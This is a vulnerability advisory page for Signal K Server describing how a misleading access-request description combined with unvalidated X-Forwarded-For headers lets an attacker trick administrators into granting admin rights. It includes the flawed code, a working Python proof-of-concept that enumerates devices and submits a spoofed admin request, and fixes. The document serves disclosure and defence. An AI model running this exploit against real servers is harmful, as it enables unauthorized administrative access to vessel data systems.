Signal K Server Vulnerable to Access Request Spoofing

Description

The SignalK access request system has two related features that when combined by themselves and with the infromation disclosure vulnerability enable convincing social engineering attacks against administrators.

When a device creates an access request, it specifies three fields: clientId, description, and permissions. The SignalK admin UI displays the description field prominently to the administrator when showing pending requests, but the actual permissions field (which determines the access level granted) is less visible or displayed separately. This allows an attacker to request admin permissions while providing a description that suggests readonly access.

The access request handler trusts the X-Forwarded-For HTTP header without validation to determine the client's IP address. This header is intended to preserve the original client IP when requests pass through reverse proxies, but when trusted unconditionally, it allows attackers to spoof their IP address. The spoofed IP is displayed to administrators in the access request approval interface, potentially making malicious requests appear to originate from trusted internal network addresses.

Since device/source names can be enumerated via the information disclosure vulnerability, an attacker can impersonate a legitimate device or source, craft a convincing description, spoof a trusted internal IP address, and request elevated permissions, creating a highly convincing social engineering scenario that increases the likelihood of administrator approval.

Affected Code

File: packages/server-admin-ui/src/views/security/AccessRequests.js

The admin UI renders access requests showing the description field prominently. The permissions field is displayed but may not be as visually prominent, leading administrators to approve based on the description text.

File: src/tokensecurity.js (access request creation and IP extraction)

// Access request accepts any permissions value from the client
const permissions = req.body.permissions  // No validation against description

// IP address extraction trusts X-Forwarded-For without validation
const ip = req.headers['x-forwarded-for'] || req.connection.remoteAddress

The code prioritizes the X-Forwarded-For header over the actual connection IP, allowing client-controlled spoofing.

Impact

An administrator who trusts device descriptions and IP addresses may inadvertently grant admin privileges to an attacker. The combination of spoofed device name, misleading description, and trusted internal IP address creates a highly convincing social engineering attack. Combined with the token theft vulnerability, this provides a complete authentication bypass requiring only one click from the admin.

PoC

import requests

TARGET = "http://localhost:3000"
SPOOFED_IP = "192.168.1.100"

def create_spoofed_request(device_name):
    payload = {
        "clientId": device_name,
        "description": f"{device_name} - Read Only",  # Misleading
        "permissions": "admin"  # Actually requesting admin!
    }

    headers = {
        "Content-Type": "application/json",
        "X-Forwarded-For": SPOOFED_IP  # Spoof internal IP
    }

    r = requests.post(
        f"{TARGET}/signalk/v1/access/requests",
        json=payload,
        headers=headers
    )

    if r.status_code == 202:
        data = r.json()
        href = data.get("href")
        request_id = href.split("/")[-1] if href else None

        print(f"[+] Access request created!")
        print(f"[+] Request ID: {request_id}")
        print(f"[+] Admin sees: '{payload['description']}'")
        print(f"[+] Actual permissions: {payload['permissions']}")
        print(f"[+] Spoofed IP: {SPOOFED_IP}")

        return request_id
    else:
        print(f"[-] Failed: {r.status_code} - {r.text}")
        return None

if __name__ == "__main__":
    # First enumerate devices/sources using info disclosure vulnerability
    sources = requests.get(f"{TARGET}/signalk/v1/api/sources").json()
    devices = [d for d in sources.keys() if d != "defaults"]

    if devices:
        print(f"[+] Found devices: {devices}")
        create_spoofed_request(devices[0])
    else:
        create_spoofed_request("sensor-01")

Recommendation

  1. Display permissions prominently. The admin UI should prominently display the requested permission level with visual warnings for elevated permissions (readwrite, admin). Consider requiring administrators to explicitly select the permission level during approval rather than accepting the requested value.
  2. Validate X-Forwarded-For headers. Only trust X-Forwarded-For headers from configured trusted proxy IP addresses. Implement Express.js trust proxy settings or equivalent. Log both the forwarded IP and the actual connection IP for audit purposes.
  3. Whitelist device IP addresses. Implement an IP whitelist for access requests, allowing only known device IP addresses to create requests. This prevents external attackers from creating spoofed requests.

Basic information

Type
reviewed
Severity
medium
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-01-02 15:26:11 UTC
Updated
2026-01-02 15:26:14 UTC
GitHub reviewed
2026-01-02 15:26:11 UTC
NVD published
2026-01-01

EPSS Score

Score Percentile
0.02% 6.55%

CVSS Scores

Base score Version Severity Vector
6.3 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:N)
No account or special rights needed—anonymous or random user is enough.
User interaction (UI:R)
A real person has to do something—click, install, enable—otherwise it doesn’t land.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:L)
Some sensitive info could get out, but not a total data dump.
Integrity (I:L)
Attackers could change some data, but it’s limited—not everything goes.
Availability (A:L)
Might cause slowdowns, glitches, or partial disruption—not a full brick.

Identifiers

CWEs

CWE id Name
CWE-290 Authentication Bypass by Spoofing

Credits

  • atsc11 (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm signalk-server < 2.19.0 2.19.0

References

cvelogic Threat Intelligence